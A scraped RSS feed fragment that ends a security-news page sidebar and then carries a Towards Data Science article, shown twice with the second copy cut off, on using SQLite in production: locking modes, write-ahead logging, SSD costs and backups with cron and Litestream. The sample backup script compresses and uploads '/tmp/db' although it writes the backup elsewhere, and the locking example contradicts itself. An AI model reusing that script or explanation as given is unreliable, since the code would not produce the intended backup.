				<a href="https://store.blackhatethicalhacking.com/" target="_blank"><span class="et_pb_image_wrap "><img decoding="async" width="1142" height="500" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png" alt="Merch" title="Store" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png 1142w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-980x429.png 980w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-480x210.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1142px, 100vw" class="wp-image-271829"></span></a>
			</div><div class=" et_pb_logo_slider  et_pb_logo_slider_0 ">
                
            </div>
			</div>
				
				
				
				
			</div>
			</div><div class="et_pb_column et_pb_column_1_4 et_pb_column_1    et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_module et_pb_sidebar_0 news-sidebar1 et_pb_widget_area clearfix et_pb_widget_area_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget rpwe_widget recent-posts-extended"><h4 class="widgettitle">Recent News</h4><div class="rpwe-block news-recent-posts-sb"><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/pumakit-a-stealthy-linux-rootkit-targeting-pre-5-7-kernels/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/12/877x440-Images-for-the-News-posts-21-300x150.png" alt="Pumakit: A Stealthy Linux Rootkit Targeting Pre-5.7 Kernels" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/pumakit-a-stealthy-linux-rootkit-targeting-pre-5-7-kernels/" target="_self">Pumakit: A Stealthy Linux Rootkit Targeting Pre-5.7 Kernels</a></h3><time class="rpwe-time published" datetime="2024-12-13T11:36:31+02:00">December 13, 2024</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/exploiting-windows-ui-automation-a-new-stealthy-attack-vector/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/12/877x440-Images-for-the-News-posts-20-300x150.png" alt="Exploiting Windows UI Automation: A New Stealthy Attack Vector" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/exploiting-windows-ui-automation-a-new-stealthy-attack-vector/" target="_self">Exploiting Windows UI Automation: A New Stealthy Attack Vector</a></h3><time class="rpwe-time published" datetime="2024-12-12T11:27:59+02:00">December 12, 2024</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/hackers-exploit-zero-day-in-cleo-mft-software-enabling-rce-and-data-theft/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/12/877x440-Images-for-the-News-posts-18-300x150.png" alt="Hackers Exploit Zero-Day in Cleo MFT Software, Enabling RCE and Data Theft" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/hackers-exploit-zero-day-in-cleo-mft-software-enabling-rce-and-data-theft/" target="_self">Hackers Exploit Zero-Day in Cleo MFT Software, Enabling RCE and Data Theft</a></h3><time class="rpwe-time published" datetime="2024-12-11T12:03:37+02:00">December 11, 2024</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/critical-openwrt-vulnerability-allowed-potential-malicious-firmware-distribution-via-attended-sysupgrade/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/12/877x440-Images-for-the-News-posts-17-300x150.png" alt="Critical OpenWrt Vulnerability Allowed Potential Malicious Firmware Distribution via Attended Sysupgrade" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/critical-openwrt-vulnerability-allowed-potential-malicious-firmware-distribution-via-attended-sysupgrade/" target="_self">Critical OpenWrt Vulnerability Allowed Potential Malicious Firmware Distribution via Attended Sysupgrade</a></h3><time class="rpwe-time published" datetime="2024-12-10T12:40:45+02:00">December 10, 2024</time><div class="rpwe-summary"></div></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></div><div class="et_pb_widget widget_block"><h3>EXPLORE OUR STORE</h3></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="233" height="300" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Tshirt-233x300.png" class="image wp-image-280999  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="300" height="280" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/RedTeamers-e1725807706904-300x280.png" class="image wp-image-281001  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="711" height="1024" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Hoodie-711x1024.png" class="image wp-image-281002  attachment-large size-large" alt=""></a></div><div class="widget_text et_pb_widget widget_custom_html"><div class="textwidget custom-html-widget"> <!-- News Adsense Adcode --> <ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div></div>
			</div><div class="et_pb_module et_pb_sidebar_1 news-sidebar2 et_animated et_pb_widget_area clearfix et_pb_widget_area_left  et_pb_text_align_justified et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget widget_block"><a href="https://www.blackhatethicalhacking.com/courses/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png"></a>
<h3>Offensive Security &amp; Ethical Hacking Course</h3>
<p>Begin the learning curve of hacking now!</p></div><div class="et_pb_widget widget_block"><hr>
<a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Solutions.png"></a>
<h3>Information Security Solutions</h3>
<p>Find out how Pentesting Services can help you.</p></div><div class="et_pb_widget widget_block"><hr>
<a href="https://discord.gg/EYMqveWXkv"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/10/Discord.png"></a>
<h3>Join our Community</h3></div>
			</div>
			</div>
				</div>
				
			</div>The post <a href="https://www.blackhatethicalhacking.com/news/glutton-a-new-modular-php-backdoor/">Glutton: A New Modular PHP Backdoor</a> first appeared on <a href="https://www.blackhatethicalhacking.com/">Black Hat Ethical Hacking</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[SQLite in Production: Dreams Becoming Reality]]></title>
<description><![CDATA[On the virtues of radical simplicityA simple landscape. From Unsplash.This is the first in a two-part series on using SQLite for machine learning. In this article, I dive into why SQLite is rapidly becoming a production-ready database. In the second article, I will discuss how to perform retrieva...]]></description>
<link>https://tsecurity.de/de/2494722/ai-nachrichten/sqlite-in-production-dreams-becoming-reality/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2494722/ai-nachrichten/sqlite-in-production-dreams-becoming-reality/</guid>
<pubDate>Thu, 12 Dec 2024 16:34:43 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>On the virtues of radical simplicity</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tka1FfADJhSGtl-9tTRyvw.png"><figcaption>A simple landscape. From Unsplash.</figcaption></figure><p><em>This</em><strong><em> </em></strong><em>is the first in a two-part series on using SQLite for machine learning. In this article, I dive into why SQLite is rapidly becoming a production-ready database. In the second article, I will discuss how to perform retrieval-augmented-generation using SQLite.</em></p><p><em>If you’d like a custom web application with generative AI integration, visit </em><a href="https://losangelesaiapps.com/"><em>losangelesaiapps.com</em></a></p><h3>SQLite: Escape from the Cave of Complexity</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*gECWcbQAkNH9YGaa.jpg"><figcaption><a href="https://en.wikipedia.org/wiki/Allegory_of_the_cave">Plato’s Allegory of the Cave</a>, by Jan Saenredam, 1604.</figcaption></figure><blockquote>“If you seek tranquility, do less.</blockquote><blockquote>— <em>Marcus Aurelius</em></blockquote><p>Most databases running software today operate on a <strong>client-server architecture</strong>. In this architecture, the server is the central system that manages data. It processes requests from and sends responses to clients. Clients here refer to users or applications that interact with the database through the server.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*CjwmnUHKaHhm6Ehq.png"><figcaption>The client-server architecture. From pixabay.</figcaption></figure><p>A simple way to understand this architecture is to use the analogy of libraries. The server is the <em>library</em>, each piece of data is a <em>book</em>, and the client is a <em>visitor</em>. In this world, visitors don’t pick books out directly from the shelves. They instead must go through the librarian, who has meticulously organized their library to make it easy to find a book. In this world, a visitor’s access to the library is mediated entirely through the library’s staff (server-side).</p><p>This is a pretty neat architecture. However, for smaller, lightweight applications it is engineering overkill. If you only have a few books, why do you need to build multiple shelves, let alone multiple rooms? The alternative to the client-server architecture is the <strong>single-file architecture </strong>used by the <strong>SQLite database</strong>.</p><p>For the uninitiated, SQLite is the Platonic ideal of databases. As opposed to running an entire server to manage the access to data, this database is housed entirely within a single file. Your application is then able to create, read, update, and destroy data by simply modifying this one file. When you deploy a web application backed by a client-server database, you are deploying not one service but two services: one for your application and one for your database. With SQLite, you only have to deploy a single service: your application with the SQLite file included. This means less complexity and less cost.</p><p>Returning to our analogy, using SQLite is like having a single notebook in which all of your data is stored. No shelves, no libraries, no librarians. You just open the book and add, delete, or update your data. Perhaps you can get fancy, and add an index in the back of your book to speed up search. You can imagine how much simpler this would be.</p><p>However, as they say in economics: there are no solutions, there are only trade-offs. SQLite is not perfect, and there are valid reasons for why it has rarely seen usage in production. In this article, I will highlight some of the issues that have dogged SQLite and how recent advancements have removed these barriers.</p><h3>Issue #1: Concurrency</h3><p>The primary issue in SQLite has traditionally been <strong>concurrency related. </strong>SQLite uses a write lock to ensure that only one write operation occurs at a time. We don’t want transactions interfering with each other. If you attempt to send concurrent write requests, you will often get a SQLITE_BUSY error, and one of the transactions will have been lost. In the case of concurrent requests, we want the transactions to queue up and play nice with each other.</p><p>Unfortunately, the default transaction mode in SQLite does not facilitate this. Some important background: a <strong>transaction</strong> typically involves a series of database <strong>statements</strong>, such as reads and writes, that are executed together.</p><pre>-- An example transaction<br>BEGIN DEFERRED TRANSACTION;<br>SELECT * FROM inventory WHERE id = 1; -- Statement 1<br>UPDATE inventory SET stock = stock + 1 WHERE id = 1; -- Statement 2</pre><p>The default transaction mode in SQLite is the <strong>deferred transaction mode. </strong>In this mode:</p><ul><li>No lock is acquired at the start of the transaction.</li><li>A <strong>read-only statement</strong> doesn’t trigger a write lock; it only requires a shared read lock, which allows concurrent reads. Think SELECT statements.</li><li>A <strong>write statement</strong> requires an exclusive write lock, which blocks all other reads and writes until the transaction is complete. Think INSERT, UPDATE, or DELETE statements.</li></ul><p>As an example, take a look at the following two transactions. Suppose they were to run at the same time:</p><pre>-- Transaction 1<br>BEGIN DEFERRED TRANSACTION;<br>SELECT * FROM inventory WHERE id = 1; <br>UPDATE inventory SET stock = stock + 1 WHERE id = 1; <br><br>-- Transcation 2<br>BEGIN DEFERRED TRANSACTION;<br>UPDATE inventory SET stock = stock - 1 WHERE id = 1; <br><br>-- Example sequence of events:<br>  -- Transaction 1 begins<br>    -- SELECT statement: No lock is acquired yet.<br>  -- Transaction 2 begins<br>    -- Acquires a write lock (UPDATE statement).<br>  -- Transcation 1 continues<br>    -- Tries to acquire a write lock (UPDATE statement).<br>    -- Fails because Transaction 2 already committed and released the lock.<br>    -- SQLite throws SQLITE_BUSY.<br>  -- Transaction 2 commits successfully. Transaction 1 has failed.</pre><p>In this scenario, because Transaction 1 was mid-transaction when the SQLITE_BUSY exception was thrown, it will not be re-queued after Transaction 2 is finished with the write lock; it will just be cancelled. SQLite doesn’t want to risk inconsistent results should another transaction modify overlapping data during the lock wait, so it just tells the interrupted transaction to buzz off.</p><p>Think of it this way: imagine you and your friend are sharing a notebook. You start reading a half-finished story in the notebook, planning to write the next part. But before you can pick up your pen, your friend snatches the notebook. “<em>You weren’t writing anything anyway!</em>” they exclaim. What if they change something crucial in your story? Frustrated and unable to continue, you give up in a huff, abandoning your attempt to finish the story. Turns out, your friend isn’t as nice as you thought!</p><p>How can we fix this issue? What if you establish the following rule: when one of you grabs the notebook, <strong>regardless of if you are reading or writing</strong>, that person gets to use the notebook until they are done? Issue solved!</p><p>This transaction mode in SQLite is known as <strong>immediate</strong>. Now, when one transaction begins, regardless of whether it is writing or reading, it claims the write lock. If a concurrent transaction attempts to claim the write lock, it will now queue up nicely behind the current one instead of throwing the SQLITE_BUSY .</p><p>Using the immediate transaction mode goes a long way towards solving the concurrency issue in SQLite. To continue improving concurrency, we can also change the <strong>journal mode</strong>. The default here is a <strong>rollback journal</strong>. In this paradigm, the original content of a database page is copied <em>before</em> modification. This way, if the transaction fails or if you so desire, you can always go back to the journal to restore the database to its original state. This is great for reproducibility, but bad for concurrency. Copying an entire page in a database is slow and grabs the write lock, delaying any read operations.</p><p>To fix this issue we can instead use <strong>write-ahead logging (WAL)</strong>. Rather than writing changes directly to the main database file, the changes are first recorded in a separate log file (the “write-ahead log”) before being applied to the database at regular intervals. Readers can still access the most recently committed write operations, as SQLite checks the WAL file in addition to the main database file on read. This separates write and read operations, easing concurrency issues that can come as a result of scaling.</p><p>To continue our analogy, write-ahead logging is like grabbing a post-it-note every time a change to the shared notebook needs to occur. If anyone wants to read a section of the notebook, they can check if there are any post-its attached to that section to get the latest updates. You can have many people simultaneously reading the notebook at the same time with this method. Once a lot of post-its start to accumulate, you can then edit the actual notebook itself, tossing the post-its once the edits have finished.</p><p>These configuration options in SQLite have been around for decades (write-ahead-logging was introduced in 2010). Given this, why hasn’t SQLite been used in production for decades? That leads us to our next issue.</p><h3>Issue #2: Slow hardware</h3><p>Hard disk drives (HDD) are notoriously slow compared to solid state drives (SSD) on a variety of operations that are important to database management. For example, SSDs are about 100 times faster than HDDs when it comes to latency (time it takes for a single I/O operation). In random I/O operations per second (IOPS), SSDs are about 50–1000 times faster than HDDs. SSDs are so much faster than HDDs because of the lack of moving parts. HDDs use spinning disks and moving parts to read and write data, much like an old turntable, whereas SDDs use only electronic components, much like a giant USB stick.</p><p>Despite their inferiority, HDDs have historically dominated the storage market primarily due to low cost. However, SDDs have quickly been catching up. In 2011, SSDs were roughly 32 times more expensive per GB than HDDs (<a href="https://www.tomshardware.com/news/ssd-hdd-solid-state-drive-hard-disk-drive-prices%2C14336.html?utm_source=chatgpt.com">source</a>). By 2023, the price gap narrowed, with SSDs now being about 3 to 5 times more expensive per GB compared to HDDs (<a href="https://darwinsdata.com/how-much-does-ssd-cost-per-gb-vs-hdd/?utm_source=chatgpt.com">source</a>). In the past year, SSD prices have increased due to cuts from manufacturers like Samsung and increasing demand in data centers. In the long run however, we can expect SSDs to continue to decrease in price. Even if parity is never reached with HDDs, the low absolute price is enough to ensure widespread adoption. In 2020, SSDs outsold HDDs, with 333 million units shipped compared to 260 million HDDs, marking a turning point in the storage market (<a href="https://www.pcgamer.com/fun-fact-ssds-outsold-hdds-last-year-but-not-in-total-capacity/?utm_source=chatgpt.com">source</a>).</p><p>As of December 2024, you can rent a dedicated vCPU with 80 GB of SSD storage for about $16 USD per month on a service like <a href="https://www.hetzner.com/cloud">Hetzner</a>. 240 GB can be had for about $61. You can get even cheaper prices with a shared vCPU. For many smaller applications this storage is more than enough. The use of cheap SSDs has removed a significant bottleneck when using SQLite in production-grade applications. But there is still one more important issue to deal with.</p><h3>Issue #3: Backups</h3><p>It goes without saying that having a backup to your database is critical in production. The last thing any startup wants is to have their primary database get corrupted and all user data lost.</p><p>The first option for creating a backup is the simplest. Since the SQLite database is just a file, you can essentially copy and paste your database into a folder on your computer, or upload it to a cloud service like AWS S3 buckets for more reliability. For small databases with infrequent writes this is a great option. As a simple example (taken from the <a href="https://litestream.io/alternatives/cron/">Litestream docs</a>), here is a bash script creating a backup:</p><pre>#!/bin/bash<br><br># Ensure script stops when commands fail.<br>set -e<br><br># Backup our database to the temp directory.<br>sqlite3 /path/to/db "VACUUM INTO '/path/to/backup'"<br><br># Compress the backup file for more efficient storage<br>gzip /tmp/db<br><br># Upload backup to S3 using a rolling daily naming scheme.<br>aws s3 cp /tmp/db.gz s3://mybucket/db-`date +%d`.gz</pre><p>A few notes:</p><ul><li>The -e option inset -e stands for “exit immediately”. This makes sure that the script will be stopped if any command fails.</li><li>SQLite’s VACUUM INTO command creates a compact backup of the SQLite database. It reduces fragmentation in the database and the file size. Think of it as a neat and tidy version of your database. However you don’t have to use VACUUM INTO ; you can replace it with .backup . This copies the entire database file, including all its data and structure as-is to another file.</li><li>SQLite databases compress well, and the gzip command facilitates this.</li><li>Finally, you can upload the copy of the file to your cloud storage provider of choice. Here we are uploading to S3.</li></ul><p>If you want to have your backups run automatically, you can configure crontab to run this job on a regular basis. Here we are running the script daily at midnight:</p><pre># Edit your cron jobs<br>crontab -e<br><br># Add this to the end of the crontab<br>0 0 * * * /path/to/my_backup_script.sh</pre><p>For write-heavy databases, where you would want to capture the state of the database at any given moment, you can use <a href="https://litestream.io/alternatives/cron/">Litestream</a>. This is an open-source tool designed to provide <em>real-time replication</em> for SQLite databases by streaming changes to a remote storage backend.</p><p>Litestream is able to track changes to SQLite’s WAL file. Remember the post-it notes? Whenever a new transaction is recorded to the WAL file, Litestream is able to replicate these incrementally to your cloud storage provider of choice. This allows us to maintain a near real-time backup of the database without creating full copies each time.</p><p>To get started with Litestream, you first have to install it. On MacOS this means using Homebrew. Then, you need to setup a litestream.yml configuration file:</p><pre># /etc/litestream.yml<br>dbs:<br>  - path: /path/to/your.db<br>    replicas:<br>      - type: s3<br>        bucket: your-s3-bucket-name<br>        path: your-database-name<br>        region: your-region</pre><p>Here, we are going to be streaming transactions to our database to an S3 bucket. Then we can run the following command to begin replication:</p><pre>litestream replicate -config /etc/litestream.yml</pre><p>In this case, we are setting any transactions in your.db to be replicated in an S3 bucket. That’s it! You are then able to restore a SQLite database to any previous state by replaying WAL changes. As an example, if you want to create a copy of your db called restored.db from a timestamp of 15:00 UTC dated 2024–12–10, you can run the following command:</p><pre>litestream restore -o /path/to/restored.db \<br>  -timestamp "2024-12-10T15:00:00Z" \<br>  s3://your-s3-bucket-name/your-database-name</pre><p>To get a backup of the latest version of your database, just omit the -timestamp flag .</p><h3>Conclusion</h3><p>I encourage you to watch this recent <a href="https://www.youtube.com/watch?v=wFUy120Fts8">talk at Rails World 2024</a> to see how SQLite is rapidly becoming production-ready. They have implemented some of the changes we have discussed here to their SQLite adapter. I also recommend reading <a href="https://fractaledmind.github.io/2024/04/15/sqlite-on-rails-the-how-and-why-of-optimal-performance/">Stephen Margheim’s article</a> detailing his work on SQLite in Rails if you want to dive deeper. You better believe these sorts of improvement are coming soon to <a href="https://gcollazo.com/optimal-sqlite-settings-for-django/">Django</a>, <a href="https://laravel-news.com/optimize-db-for-laravel-sqlite">Laravel</a>, etc.</p><p>The improvements to SQLite for production are not finished. David Heinemeier Hansson, creator of Rails, wants to push SQLite to be able to run a mid-size SaaS company off of. Exciting times!</p><a href="https://medium.com/media/d4e4130eaf199dae1a4bfff5596cf430/href">https://medium.com/media/d4e4130eaf199dae1a4bfff5596cf430/href</a><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=94557bec095b" width="1" height="1" alt=""><hr><p><a href="https://towardsdatascience.com/sqlite-in-production-dreams-becoming-reality-94557bec095b">SQLite in Production: Dreams Becoming Reality</a> was originally published in <a href="https://towardsdatascience.com/">Towards Data Science</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SQLite in Production: Dreams Becoming Reality]]></title>
<description><![CDATA[On the virtues of radical simplicityA simple landscape. From Unsplash.This is the first in a two-part series on using SQLite for machine learning. In this article, I dive into why SQLite is rapidly becoming a production-ready database. In the second article, I will discuss how to perform retrieva...]]></description>
<link>https://tsecurity.de/de/2494723/ai-nachrichten/sqlite-in-production-dreams-becoming-reality/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2494723/ai-nachrichten/sqlite-in-production-dreams-becoming-reality/</guid>
<pubDate>Thu, 12 Dec 2024 16:34:43 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>On the virtues of radical simplicity</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tka1FfADJhSGtl-9tTRyvw.png"><figcaption>A simple landscape. From Unsplash.</figcaption></figure><p><em>This</em><strong><em> </em></strong><em>is the first in a two-part series on using SQLite for machine learning. In this article, I dive into why SQLite is rapidly becoming a production-ready database. In the second article, I will discuss how to perform retrieval-augmented-generation using SQLite.</em></p><p><em>If you’d like a custom web application with generative AI integration, visit </em><a href="https://losangelesaiapps.com/"><em>losangelesaiapps.com</em></a></p><h3>SQLite: Escape from the Cave of Complexity</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*gECWcbQAkNH9YGaa.jpg"><figcaption><a href="https://en.wikipedia.org/wiki/Allegory_of_the_cave">Plato’s Allegory of the Cave</a>, by Jan Saenredam, 1604.</figcaption></figure><blockquote>“If you seek tranquility, do less.</blockquote><blockquote>— <em>Marcus Aurelius</em></blockquote><p>Most databases running software today operate on a <strong>client-server architecture</strong>. In this architecture, the server is the central system that manages data. It processes requests from and sends responses to clients. Clients here refer to users or applications that interact with the database through the server.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*CjwmnUHKaHhm6Ehq.png"><figcaption>The client-server architecture. From pixabay.</figcaption></figure><p>A simple way to understand this architecture is to use the analogy of libraries. The server is the <em>library</em>, each piece of data is a <em>book</em>, and the client is a <em>visitor</em>. In this world, visitors don’t pick books out directly from the shelves. They instead must go through the librarian, who has meticulously organized their library to make it easy to find a book. In this world, a visitor’s access to the library is mediated entirely through the library’s staff (server-side).</p><p>This is a pretty neat architecture. However, for smaller, lightweight applications it is engineering overkill. If you only have a few books, why do you need to build multiple shelves, let alone multiple rooms? The alternative to the client-server architecture is the <strong>single-file architecture </strong>used by the <strong>SQLite database</strong>.</p><p>For the uninitiated, SQLite is the Platonic ideal of databases. As opposed to running an entire server to manage the access to data, this database is housed entirely within a single file. Your application is then able to create, read, update, and destroy data by simply modifying this one file. When you deploy a web application backed by a client-server database, you are deploying not one service but two services: one for your application and one for your database. With SQLite, you only have to deploy a single service: your application with the SQLite file included. This means less complexity and less cost.</p><p>Returning to our analogy, using SQLite is like having a single notebook in which all of your data is stored. No shelves, no libraries, no librarians. You just open the book and add, delete, or update your data. Perhaps you can get fancy, and add an index in the back of your book to speed up search. You can imagine how much simpler this would be.</p><p>However, as they say in economics: there are no solutions, there are only trade-offs. SQLite is not perfect, and there are valid reasons for why it has rarely seen usage in production. In this article, I will highlight some of the issues that have dogged SQLite and how recent advancements have removed these barriers.</p><h3>Issue #1: Concurrency</h3><p>The primary issue in SQLite has traditionally been <strong>concurrency related. </strong>SQLite uses a write lock to ensure that only one write operation occurs at a time. We don’t want transactions interfering with each other. If you attempt to send concurrent write requests, you will often get a SQLITE_BUSY error, and one of the transactions will have been lost. In the case of concurrent requests, we want the transactions to queue up and play nice with each other.</p><p>Unfortunately, the default transaction mode in SQLite does not facilitate this. Some important background: a <strong>transaction</strong> typically involves a series of database <strong>statements</strong>, such as reads and writes, that are executed together.</p><pre>-- An example transaction<br>BEGIN DEFERRED TRANSACTION;<br>SELECT * FROM inventory WHERE id = 1; -- Statement 1<br>UPDATE inventory SET stock = stock + 1 WHERE id = 1; -- Statement 2</pre><p>The default transaction mode in SQLite is the <strong>deferred transaction mode. </strong>In this mode:</p><ul><li>No lock is acquired at the start of the transaction.</li><li>A <strong>read-only statement</strong> doesn’t trigger a write lock; it only requires a shared read lock, which allows concurrent reads. Think SELECT statements.</li><li>A <strong>write statement</strong> requires an exclusive write lock, which blocks all other reads and writes until the transaction is complete. Think INSERT, UPDATE, or DELETE statements.</li></ul><p>As an example, take a look at the following two transactions. Suppose they were to run at the same time:</p><pre>-- Transaction 1<br>BEGIN DEFERRED TRANSACTION;<br>SELECT * FROM inventory WHERE id = 1; <br>UPDATE inventory SET stock = stock + 1 WHERE id = 1; <br><br>-- Transcation 2<br>BEGIN DEFERRED TRANSACTION;<br>UPDATE inventory SET stock = stock - 1 WHERE id = 1; <br><br>-- Example sequence of events:<br>  -- Transaction 1 begins<br>    -- SELECT statement: No lock is acquired yet.<br>  -- Transaction 2 begins<br>    -- Acquires a write lock (UPDATE statement).<br>  -- Transcation 1 continues<br>    -- Tries to acquire a write lock (UPDATE statement).<br>    -- Fails because Transaction 2 already committed and released the lock.<br>    -- SQLite throws SQLITE_BUSY.<br>  -- Transaction 2 commits successfully. Transaction 1 has failed.</pre><p>In this scenario, because Transaction 1 was mid-transaction when the SQLITE_BUSY exception was thrown, it will not be re-queued after Transaction 2 is finished with the write lock; it will just be cancelled. SQLite doesn’t want to risk inconsistent results should another transaction modify overlapping data during the lock wait, so it just tells the interrupted transaction to buzz off.</p><p>Think of it this way: imagine you and your friend are sharing a notebook. You start reading a half-finished story in the notebook, planning to write the next part. But before you can pick up your pen, your friend snatches the notebook. “<em>You weren’t writing anything anyway!</em>” they exclaim. What if they change something crucial in your story? Frustrated and unable to continue, you give up in a huff, abandoning your attempt to finish the story. Turns out, your friend isn’t as nice as you thought!</p><p>How can we fix this issue? What if you establish the following rule: when one of you grabs the notebook, <strong>regardless of if you are reading or writing</strong>, that person gets to use the notebook until they are done? Issue solved!</p><p>This transaction mode in SQLite is known as <strong>immediate</strong>. Now, when one transaction begins, regardless of whether it is writing or reading, it claims the write lock. If a concurrent transaction attempts to claim the write lock, it will now queue up nicely behind the current one instead of throwing the SQLITE_BUSY .</p><p>Using the immediate transaction mode goes a long way towards solving the concurrency issue in SQLite. To continue improving concurrency, we can also change the <strong>journal mode</strong>. The default here is a <strong>rollback journal</strong>. In this paradigm, the original content of a database page is copied <em>before</em> modification. This way, if the transaction fails or if you so desire, you can always go back to the journal to restore the database to its original state. This is great for reproducibility, but bad for concurrency. Copying an entire page in a database is slow and grabs the write lock, delaying any read operations.</p><p>To fix this issue we can instead use <strong>write-ahead logging (WAL)</strong>. Rather than writing changes directly to the main database file, the changes are first recorded in a separate log file (the “write-ahead log”) before being applied to the database at regular intervals. Readers can still access the most recently committed write operations, as SQLite checks the WAL file in addition to the main database file on read. This separates write and read operations, easing concurrency issues that can come as a result of scaling.</p><p>To continue our analogy, write-ahead logging is like grabbing a post-it-note every time a change to the shared notebook needs to occur. If anyone wants to read a section of the notebook, they can check if there are any post-its attached to that section to get the latest updates. You can have many people simultaneously reading the notebook at the same time with this method. Once a lot of post-its start to accumulate, you can then edit the actual notebook itself, tossing the post-its once the edits have finished.</p><p>These configuration options in SQLite have been around for decades (write-ahead-logging was introduced in 2010). Given this, why hasn’t SQLite been used in production for decades? That leads us to our next issue.</p><h3>Issue #2: Slow hardware</h3><p>Hard disk drives (HDD) are notoriously slow compared to solid state drives (SSD) on a variety of operations that are important to database management. For example, SSDs are about 100 times faster than HDDs when it comes to latency (time it takes for a single I/O operation). In random I/O operations per second (IOPS), SSDs are about 50–1000 times faster than HDDs. SSDs are so much faster than HDDs because of the lack of moving parts. HDDs use spinning disks and moving parts to read and write data, much like an old turntable, whereas SDDs use only electronic components, much like a giant USB stick.</p><p>Despite their inferiority, HDDs have historically dominated the storage market primarily due to low cost. However, SDDs have quickly been catching up. In 2011, SSDs were roughly 32 times more expensive per GB than HDDs (<a href="https://www.tomshardware.com/news/ssd-hdd-solid-state-drive-hard-disk-drive-prices%2C14336.html?utm_source=chatgpt.com">source</a>). By 2023, the price gap narrowed, with SSDs now being about 3 to 5 times more expensive per GB compared to HDDs (<a href="https://darwinsdata.com/how-much-does-ssd-cost-per-gb-vs-hdd/?utm_source=chatgpt.com">source</a>). In the past year, SSD prices have increased due to cuts from manufacturers like Samsung and increasing demand in data centers. In the long run however, we can expect SSDs to continue to decrease in price. Even if parity is never reached with HDDs, the low absolute price is enough to ensure widespread adoption. In 2020, SSDs outsold HDDs, with 333 million units shipped compared to 260 million HDDs, marking a turning point in the storage market (<a href="https://www.pcgamer.com/fun-fact-ssds-outsold-hdds-last-year-but-not-in-total-capacity/?utm_source=chatgpt.com">source</a>).</p><p>As of December 2024, you can rent a dedicated vCPU with 80 GB of SSD storage for about $16 USD per month on a service like <a href="https://www.hetzner.com/cloud">Hetzner</a>. 240 GB can be had for about $61. You can get even cheaper prices with a shared vCPU. For many smaller applications this storage is more than enough. The use of cheap SSDs has removed a significant bottleneck when using SQLite in production-grade applications. But there is still one more important issue to deal with.</p><h3>Issue #3: Backups</h3><p>It goes without saying that having a backup to your database is critical in production. The last thing any startup wants is to have their primary database get corrupted and all user data lost.</p><p>The first option for creating a backup is the simplest. Since the SQLite database is just a file, you can essentially copy and paste your database into a folder on your computer, or upload it to a cloud service like AWS S3 buckets for more reliability. For small databases with infrequent writes this is a great option. As a simple example (taken from the <a href="https://litestream.io/alternatives/cron/">Litestream docs</a>), here is a bash script creating a backup:</p><pre>#!/bin/bash<br><br># Ensure script stops when commands fail.<br>set -e<br><br># Backup our 